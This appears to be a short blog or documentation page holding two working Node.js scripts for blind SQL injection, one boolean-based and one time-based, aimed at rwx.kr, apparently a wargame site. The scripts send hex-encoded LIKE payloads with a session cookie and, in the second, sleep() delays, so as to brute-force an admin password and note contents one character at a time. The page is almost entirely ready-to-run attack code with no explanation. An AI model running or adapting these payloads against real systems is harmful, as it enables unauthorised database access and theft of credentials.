docs

Sql Injection with NodeJS

Blind

const request = require('request');
const dict = '0123456789abcdefghijklmnopqrstuvwxyz={/}:.,_';

option = (query) => ({
	"headers": {
		"Host": "rwx.kr",
		"User-Agent": "Mozilla/5.0",
		"Accept": "text/html",
		"Cookie": "PHPSESSID=posix"
    },
    "qs": { "pw" : `' || id=0x61646d696e && pw like 0x${Buffer.from(query).toString('hex')}25 #`},
	"method": "GET",
	"uri": "http://rwx.kr/page.php"
});

function exploit(data = '') {
    for (let chr of dict) {
        request(option(data + chr), function(err, res, body) {
            if (body.indexOf('Hello admin') !== -1) {
                console.log(data + chr);
                exploit(data + chr);
            }
        });
    }
}

exploit();

Time based Blind

const request = require('request-promise');
const dict = '0123456789abcdefghijklmnopqrstuvwxyz:={}./_';
const delay = 2;

const option = (query) => ({
	"headers": {
		"Host": "rwx.kr",
		"User-Agent": "Mozilla/5.0",
		"Content-Type": "application/x-www-form-urlencoded",
		"Cookie": "PHPSESSID=posix"
	},
    "body": `order=(select concat(title,0x3a,contents) from note where id=0x61646d696e)` +
            `like 0x${Buffer.from(query).toString('hex')}25 and sleep(${delay})`,
	"method": "POST",
	"uri": "http://rwx.kr/"
});


async function exploit(data = '') {
    for (let chr of dict) {

        var query = data + chr
        var begin = new Date().getTime();

        await request(option(query));

        if (new Date().getTime() - begin > delay * 1000) {
            console.log(data + chr);
            return exploit(data + chr);
        }
    }
}

exploit();

Leave a Reply

Your email address will not be published. Required fields are marked *